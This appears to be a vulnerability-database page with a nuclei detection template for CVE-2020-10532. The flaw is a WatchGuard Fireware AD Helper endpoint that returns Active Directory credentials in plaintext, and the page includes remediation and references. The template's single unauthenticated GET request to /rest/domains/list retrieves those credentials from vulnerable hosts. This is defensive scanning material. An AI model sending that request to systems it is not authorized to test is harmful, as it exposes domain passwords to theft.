Lucene search
K

WatchGuard Fireware AD Helper Component - Credentials Disclosure

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

WatchGuard Fireware AD Helper exposes plaintext AD credentials; upgrade to 5.8.5.10317.

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
WatchGuard Fireware Plaintext Password Vulnerability
13 Mar 202000:00
cnvd
CVE
CVE-2020-10532
12 Mar 202018:21
cve
Cvelist
CVE-2020-10532
12 Mar 202018:21
cvelist
EUVD
EUVD-2020-2985
7 Oct 202500:30
euvd
NVD
CVE-2020-10532
12 Mar 202019:15
nvd
OSV
CVE-2020-10532
12 Mar 202019:15
osv
Prion
Design/Logic Flaw
12 Mar 202019:15
prion
RedhatCVE
CVE-2020-10532
22 May 202515:09
redhatcve
id: CVE-2020-10532

info:
  name: WatchGuard Fireware AD Helper Component - Credentials Disclosure
  author: gy741
  severity: critical
  description: WatchGuard Fireware Threat Detection and Response (TDR) service contains a credential-disclosure vulnerability in the AD Helper component that allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext.
  impact: |
    Remote attackers can retrieve cleartext passwords, leading to potential account compromise and further system exploitation.
  remediation: |
    Update to version 5.8.5.10317 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10532
    - https://www.exploit-db.com/exploits/48203
    - https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability
  classification:
    cve-id: CVE-2020-10532
    epss-score: 0.02785
    epss-percentile: 0.84668
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-288
  metadata:
    max-request: 1
  tags: cve,cve2020,watchguard,disclosure,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"fullyQualifiedName"'
          - '"logonDomain"'
          - '"username"'
          - '"password"'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009988fadee2fbb3974121377e634fa8f39790b23d4c47717f7164e83ecbd8bc5d022100ba67d0d3ea9aeaa32793f931ff7975ed1d78b7e0f6447d4fd6e1acc4b909550d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 May 2026 21:13Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.02785
17